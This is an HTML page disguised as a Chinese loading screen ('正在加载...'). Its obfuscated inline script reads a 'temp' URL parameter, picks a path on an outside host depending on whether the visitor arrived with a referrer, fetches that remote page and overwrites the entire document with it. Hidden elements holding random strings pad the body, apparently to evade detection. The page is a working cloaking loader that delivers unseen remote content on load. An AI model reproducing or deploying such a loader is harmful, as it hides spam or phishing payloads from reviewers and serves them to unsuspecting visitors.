<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SoTE6RP9VcB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SoTE6RP9VcB .qEw0DmEICI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SoTE6RP9VcB .content {
            line-height: 50px;
            text-align: center
        }

        .SoTE6RP9VcB .img {
            width: 100%
        }

        .SoTE6RP9VcB .xMNWxnyh {
            text-align: center
        }

        .SoTE6RP9VcB .xMNWxnyh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SoTE6RP9VcB .xMNWxnyh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SoTE6RP9VcB .xMNWxnyh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SoTE6RP9VcB .xMNWxnyh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SoTE6RP9VcB .xMNWxnyh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SoTE6RP9VcB .xMNWxnyh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SoTE6RP9VcB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function f2osLvUlohFEl(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vkvRwNH = f2osLvUlohFEl('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vkvRwNH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vkvRwNH +".html?a=share";
		}
		
        l865MP=url+"#"+new Date().getTime();
        l865MP && function() {
            $.get(l865MP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>rx2TK9i80sZiZEU07PUpgA6dTHDokRRHkLa6tC4uAt04ChzZ75ojlFu4QgLm0D9319Of58Bm486krygeM6Ew1idOvYF76B</div>
<ul style='display:none' >t6vgkcOQH8bgxaHW9734QTei</ul>
<img  src='' style='display:none'>
<b style='display:none' >VzmLMIBAlQE</b>
<ul style='display:none' >t6vgkcOQH8bgxaHW9734QTei</ul>
<h1 style='display:none' >Fy5rUSmJzYOgt40z0brIwwUJHsY</h1>
<ul style='display:none' >t6vgkcOQH8bgxaHW9734QTei</ul><div class="SoTE6RP9VcB">
    <div class="qEw0DmEICI">
        <div class="xMNWxnyh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >dDAnlpixT2gNrqSgGFP3Rk71wBjQ7</li>
<img  src='' style='display:none'>
<b style='display:none' >VgIBS8mBP0mb7</b></body>
</html>